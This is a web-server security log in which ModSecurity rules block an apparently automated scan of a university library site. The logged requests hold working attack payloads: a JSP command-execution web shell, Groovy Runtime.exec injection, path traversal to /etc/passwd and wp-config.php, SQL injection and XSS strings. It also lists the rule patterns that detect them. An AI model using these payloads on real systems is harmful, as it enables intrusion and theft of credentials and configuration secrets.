[Tue Aug 29 11:47:47.181551 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14c8Co-f0AAAjM7GcAAAAT"]
[Tue Aug 29 11:47:47.430302 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkcgSwAAAAM"]
[Tue Aug 29 11:47:48.353348 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkBKoEAAAAb"]
[Tue Aug 29 11:47:48.440950 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkNPoQAAAAI"]
[Tue Aug 29 11:47:49.495320 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkNPocAAAAI"]
[Tue Aug 29 11:47:49.564696 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkaC@kAAAAJ"]
[Tue Aug 29 11:47:50.364289 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjqDFAAAAAH"]
[Tue Aug 29 11:47:50.394880 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjCbLcAAAAB"]
[Tue Aug 29 11:47:50.395936 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAj1198AAAAa"]
[Tue Aug 29 11:47:50.415589 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAhT4C8AAAAD"]
[Tue Aug 29 11:47:51.434439 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "digilibfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkBKpAAAAAb"]
[Tue Aug 29 11:47:51.441109 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjCbL0AAAAB"]
[Tue Aug 29 11:47:52.465514 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAkNPpEAAAAI"]
[Tue Aug 29 11:47:52.520639 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkAL9cAAAAU"]
[Tue Aug 29 11:47:53.432891 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjtc5kAAAAX"]
[Tue Aug 29 11:47:56.467881 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqIAAAAI"]
[Tue Aug 29 11:47:57.436049 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkaC-0AAAAJ"]
[Tue Aug 29 11:47:58.388469 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAhui-kAAAAr"]
[Tue Aug 29 11:47:58.468929 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAhl0NoAAAAi"]
[Tue Aug 29 11:47:59.784853 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkdu6MAAAAO"]
[Tue Aug 29 11:48:02.492180 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAj12AgAAAAa"]
[Tue Aug 29 11:48:03.368073 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAjtc6AAAAAX"]
[Tue Aug 29 11:48:04.363850 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hMCo-f0AAAjCbN0AAAAB"]
[Tue Aug 29 11:48:04.420661 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkdu7sAAAAO"]
[Tue Aug 29 11:48:05.427804 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkdu8EAAAAO"]
[Tue Aug 29 11:48:06.363650 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkNPs4AAAAI"]
[Tue Aug 29 11:48:06.410739 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAjtc6oAAAAX"]
[Tue Aug 29 11:48:07.566604 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAdxU0YAAAAC"]
[Tue Aug 29 11:48:08.394724 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkAL-MAAAAU"]
[Tue Aug 29 11:48:09.432043 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAkdu9AAAAAO"]
[Tue Aug 29 11:48:09.456819 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjM7JgAAAAT"]
[Tue Aug 29 11:48:11.453651 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw84AAAAW"]
[Tue Aug 29 11:48:12.352448 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAhujBEAAAAr"]
[Tue Aug 29 11:48:12.459130 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN4MAAAAL"]
[Tue Aug 29 11:48:12.717661 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfh.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgoAAAAH"]
